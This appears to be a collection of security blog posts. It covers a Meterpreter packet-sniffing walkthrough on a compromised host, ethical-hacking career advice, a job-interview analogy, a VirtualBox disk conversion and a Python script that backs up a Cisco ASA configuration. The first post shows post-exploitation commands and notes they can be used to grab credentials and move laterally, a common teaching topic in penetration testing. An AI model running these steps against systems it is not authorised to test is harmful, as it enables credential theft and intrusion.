Meterpreter allow you to run packet sniffer with extension, and something very important is that the sniffer is never saved in the target hard drive. I will explaint hwo to enable packet sniffer with Metasploit with Meterpreter:

 

Lets consider you are already connect with any exploit and meterpreter enable, then you type the following:

 

###user sniffer extension

 

meterpreter > use sniffer

 

Loading extension sniffer...success.

 

meterpreter > ?

 

 

....

 

Sniffer Commands

================

 

    Command             Description

    -------             -----------

    sniffer_dump        Retrieve captured packet data to PCAP file

    sniffer_interfaces  Enumerate all sniffable network interfaces

    sniffer_release     Free captured packets on a specific interface instead of downloading them

    sniffer_start       Start packet capture on a specific interface

    sniffer_stats       View statistics of an active capture

    sniffer_stop        Stop packet capture on a specific interface

 
 
### We try to see what interface we will to use to sniff the traffic
 
 
meterpreter > sniffer_interfaces
 
 
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
 
 
###You can see the interface 2 is the network one, we will start using that interface:
 
meterpreter > sniffer_start 2
 
[*] Capture started on interface 2 (50000 packet buffer)
 
 
### Stop the sniffer
 
meterpreter > sniffer_stop 2
 
[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
 
 
### Download the data
 
meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap
 
 
The I was able to open the file using wireshark raul.pcap
 
Summary
 
Where can you use this? You can use it to grab credentials, move horizontal on the network if you are pentesting a network or if you are troubleshooting any computer problem on the network.
 
 
 
 

A lot of people want to be ethical hacker or penetration testing, it is very rewarded job and also require a lot of effort, I will describe in this article what knowledge you need if you want to be ethical hacker. I will not touch the soft skills only the technical ones.

 

First this is not an easy path, it will require perseverance and a lot of self study including think completely different than any other tech (outside the box). 

 

Basic Knowledge

 

Yes, you need to have basic knowledge and it has to be very solid, you do not have the luxury to have holes in your basic knowledge.

 

Knowledge of Windows/Linux OS, you have to be strong in one of them and very proficient in the second, I am not saying you can create a cluster with those servers, I am saying the same knowledge you should have if you are a System Admin or System Engineer working for an IT company (yes, it is very different working for one company than working for one).

 

Network knowledge, yes, you have to have knowledge how routing works, tcp/udp, packets, routers, switches, arp, firewalls, etc. How will you bypass a firewall if you do not know how it works or sniff traffic if you do not know switches?

 

Programming knowledge, you have to have one language where you are strong and if you are going to web ethical hacker you have have more that one language. A lot of hacker use perl and python.

 

Specialty Knowledge

 

This depend in what you want to be good, you cannot be strong in all the specialty with some exceptions. These are some example

 

Specialty Attacking  Network: For this you need to have a good knowledge of protocols, routers, switches firewalls, wifi,packets, etc. 

 

Specialty Attacking Systems: This include a lot of the networks because you use packets, etc. Plus good knowledge in Windows/Linux and how to escalate on it to be an administrator on the server or domain.

 

Attacking Web Applications: In this you have to have knowledge of different web programming language like ASP, PHP, Java, etc. Also you need to have good databases knowledge, yes, How will you try to do SQL injection when you do not know anything about SQL queries?

 

Conclusion

 

A lot of ethical hackers have a mix of skills, They normally are strong in one specialty and a little weak in the other specialty, In the beginning do not worry what skills you will have, Begin to build your skills and later you will find what of those fields you want to be and go for, Enjoy all the process.

 

 

 

 

 

 

 

 

You got a phone call for a Security Analyst position in your area, you are excited, you've been applying for that kind of position, now you got their attention and have a first phone interview what will you do?

 

You will need to follow the same steps that a hacker does when attack a company, let's check:

 

Phase 1 - Reconnaissance

 

Yes, you will need to gather information about the company and the person or people who will do the first interview on the phone. Sure the recruiter will tell you the name (s) of them and the time. 

 

With the name (s) and company name you begin to research, the first thing is the company website, you need to know what the company does and what it means. Inside/out, including what position are available, the requirements, etc.

 

Now with the interviewer name find everything that is possible, check LinkedIn, Google+, Facebook, etc. Yes, sometime you can get in Internet where he/she lives and what kind of sport he/she plays, the better you know about that person(s) the better you will have a chance to connect.

 

Phase 2- Scanning

 

During the phone interview you have the chance to send a few packets, you have the chance to ask questions about the position, requirements, environment, ask interesting question, and those question had to be prepared before the phone interview.  Do not make uncomfortable questions, you do not want to crash your target.

 

Phase 3 - Gaining Access

 

This is the face to face interview, here you will be able to send your exploits, show then who you are, your technical and not technical skills like good communication skills. show them the ideal person for the Security Analyst position is YOU.

 

Remember in this phase you still are discovering, now you need to scan more and a little more, ask more questions and remember do not crash the server, you do not want denial of services DOS.

 

 Phase 4 - Maintaining Access

 

In this phase after the phone and face to face interview send an email saying what you got of the interview, showing you are interested in that position and leave the door open for more questions from them, maintain your access.

 

Phase 5 - Covering Tracks

 

If you got the position, CONGRATULATION and if not you got a lot of experience in this pentest, you will drill the next one, remember the Pentesters have to be the masters. Also in this situation, where you did not get the position send an email with a thank you for the interview, who knows they keep you in their mind and they could change their decision.

 

If you look your job search like a penetration testing process, then first you will enjoy it and second you will increase your confidence in yourself and success.

 

Keep going and enjoy the process.

 

Please tell me what do you think in the forum at http://www.learn-security.net/

 

Sometimes we have everything in front of us and we begin to look for in a different place, it was something simple.

 

Virtual box has a tool that does the job for us and very quickly:

 

I have a virtual machine in Virtual box I want to move it to Hypver-V so I did the following:

 

Hard drive name CEH-XP.vdi

 

1. First we go where virtual box is installed: cd C:\Program Files\Oracle\VirtualBox>

 

2. Now I use the tool vboxmanage with the switch clonehd:

 

C:\Program Files\Oracle\VirtualBox>vboxmanage clonehd "E:\Images\Virtual machines\CEH\CEH-XP.vdi" z:\ceh-xp.vhd --format vhd

 

0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%

 

Clone hard disk created in format 'vhd'. UUID: 801c7ac4-b396-42cb-bf9a-939d78ad0

8f8

 

If you noticed my hard drive was in the E drive and my destination drive was in the Z drive, your case is going to be different.

 

3. Now we create a virtual machine in Hyper-V without hard drive and attach the result hard drive to the virtual machine in my case was ceh-xp.vhd

 

This was quicker than my export to OVF and later to other format.

Twice a year the Security Analyst needs to do firewall review for PCI or other compliance, Yes, we need to have something that can automate to grab the latest firewall configuration to analyze it. I will describe in this blog one simple script in python to grab the configuration with explanations.

 

I am suing in this script two modules pexpect and sys, the first one allow us to connect simulating if we are doing it from the console itself. This scrip will ask you for the firewall's IP address.

 

The script begin (copy from bellow): 

 

import pexpect

import sys

 

asa_ip = raw_input ('Please Enter ASA IP: ')

user = "your-username-on-the-device"

password = "P@ssw0rd"

password_enable = "P@ssw0rd"

 

 

#This establish the SSH connection

 

child = pexpect.spawn ('ssh %s@%s' % (user,asa_ip))

 

#This log the result

fout = file('firewall.%s.txt' % asa_ip,'w')

 

#Expect the device to ask the password 

child.expect('password:')

 

#Script send the password 

child.sendline(password)

 

#Expect the '>" and type enable

child.expect('>')

child.sendline('enable')

 

#Expect asking enable password and send the password

child.expect('Password:')

child.sendline(password_enable)

 

child.expect('#')

 

#Send 'terminal pager 0' to avoid keep pressing Enter, if you do not do this you will have time out

child.sendline('terminal pager 0')

 

# Send the sh running-config command 

child.expect('#')

child.sendline('sh running-config')

 

#Max file size

child.maxread=999999999

child.timeout=360

 

#Put it in the log file

child.logfile_read = fout

 

#Expect : end to finish the configuration 

child.expect(': end')

 

print child.before

child.send('exit')

 

child.sendline()

 

 

# Clean the file, removing Cisco commands

 

with open('firewall.%s.txt' % asa_ip,'r') as fin:

        data = fin.read().splitlines(True)

with open('firewall.%s.txt' % asa_ip,'w') as fout:

        fout.writelines(data[1:])

 
#Finish script
 
At the end the script will create a txt file where you will have the firewall configuration. You can use this script to backup your configuration or just to begin your firewall review.